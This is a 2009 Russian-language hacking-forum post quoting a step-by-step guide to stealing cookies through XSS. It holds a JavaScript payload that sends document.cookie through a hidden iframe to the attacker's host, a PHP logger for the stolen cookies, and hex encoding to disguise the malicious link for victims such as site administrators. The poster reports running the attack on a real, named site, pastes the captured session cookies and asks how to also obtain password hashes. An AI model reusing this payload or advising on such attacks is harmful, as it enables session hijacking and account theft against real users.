ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помогите разобраться!!!
  #1  
Старый 18.01.2009, 16:20
Аватар для hash
hash
Новичок
Регистрация: 13.11.2008
Сообщений: 27
Провел на форуме:
46190

Репутация: 3
Отправить сообщение для hash с помощью ICQ
По умолчанию Помогите разобраться!!!

Привет онлайновые духи), на одном из форумов посвященных хеку нашел такой способ кражи куков:

Цитата:
Автор: Jenizix
Ну найти в интернете описание XSS-бага я думаю труда не составит... Перейдем сразу к использованию:
-= 3-2-1 go! =-
Сначала зарегистрируем ( или возьмем имеющийся ) домен с хостингом ( пофиг какого уровня =)))) ) с поддержкой PHP... допустим мы зарегили xss.host.ru... Создадим файл xss.js с таким содержимым:
CODE document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');
Этот JavаScript будет открывать невидимый iframe на странице, в котором будет гризиться наш скрипт принимающий куки... + ему будет передаваться имя сайта откуда куки были стырены.
Я выбрал тег <iframe> т.к. у некоторых отключен показ рисунков => тег <img> не прокатит... да и попапы могут резаться...
Теперь создадим файл xss.php:CODE <? $file = fopen("cookies","a"); fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n"); fclose($file); ?>
Этот скрипт будет записывать дату и полученое "печенье" в файл cookies Закинем оба файла в веб-директорию нашего сайта... ну вощем чтоб они были доступны как http://xss.host.ru/xss.js и http://xss.host.ru/xss.php
-= Боевые действия =-
Ну теперь найдем бажный сайт с XSS уязвимостью. Допустим уязвимость будет тут: http://site.ru/find.php?find=[xss] ок. уязвимость есть. пошлем скрипту find.php запрос типа find.php?find=<script src=http://xss.host.ru/xss.js></script> и затем открываем http://xss.host.ru/cookies и видим стырены куки! =)))
-= Шифруемся =-
НО! В открытую этот линк кидать не стоит... палевно... сделаем так, напишем php-скрипт для кодировки символов в hex и для разкодировки из hex: hex.php:
CODE <? $str = urldecode($_SERVER['QUERY_STRING']); for($i=0;$i<strlen($str);$i++) { $hex=dechex(ord($str[$i])); if($str[$i]=='&') echo "$str[$i]"; else echo "%$hex"; } ?> ну и unhex.php:CODE <? echo urldecode($_SERVER['QUERY_STRING']); ?> например нам нужно чтобы юзер прошелся по этой ссылке: http://site.ru/find.php?find=<script src=http://xss.host.ru/xss.js></script> но как я уже говорил, в открытую ее ему кидать - палевно... заюзаем наш hex.php: http://xss.host.ru/hex.php?<script src=http://xss.host.ru/xss.js></script>
Получим вот что: %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%78%73%73%2e %68%6f%73%74%2e%72%75%2f%78%73%73%2e%6a%73%3e%3c%2 f%73%63%72%69%70%74 %3e
это hex представление текста: <script src=http://xss.host.ru/xss.js></script> Теперь наша ссылка будет выглядеть вот так:
QUOTE http://site.ru/find.php?find=%3c%73%63%72%69%70%74%20%73%72%63%3d %68%74%74%70%3a%2f%2f%78%73%73%2e %68%6f%73%74%2e%72%75%2f%78%73%73%2e%6a%73%3e%3c%2 f%73%63%72%69%70%74 %3e
Как видите, не очень и палиться =))) Теперь осталось скинуть этот линк какомунибудь юзеру ( а лучше админу ) сайта site.ru и ждать его куков ( если конечно они там юзаются )... Куки могут быть в hex-виде... тут нам придет на помощ unhex.php: http://xss.host.ru/unhex.php?[тут_куки]
-= Подводим итоги =-
Теперь у нас есть полноценные скрипты для проведения XSS-атаки. Еще можно наш xss.js прогнать через hex.php чтоб еще побольше обезопаситься )))
Так вот нашел бажный сайт, проделавши все вышесказанное, в фаиле cookies приходят только вот такие пиченки 18.01.09 09:34][www.bgsha.com]:BG..._COM_LOGIN=red-white;%20PHPSESSID=e0f723cb0615e9dc96432a0edae123f 1;%20BGSHA_COM_GUEST_ID=158115;%20BGSHA_COM_LAST_V ISIT=18.01.2009+12%3A30%3A52 ВОТ ВОПРОС: Как мы видим логин юзверя пришел но где хеш с пасом? Может тут код какой подправить нужо или может что я не так сделал? Помогите разобратьсь!!!
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите разобраться в коде фейка! andruhasms Разное - Покупка, продажа, обмен 7 15.01.2009 00:48
Помогите разобраться.... DarkMist PHP, PERL, MySQL, JavaScript 2 04.01.2009 03:15
Помогите разобраться и инклудом! MyPoorBrain Уязвимости 3 11.11.2006 20:41
Помогите разобраться с угоном Аськи seeattact ICQ 5 17.01.2006 03:14
Sql-инъекции в чате. Помогите разобраться. Sumdex Чаты 1 28.03.2005 15:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ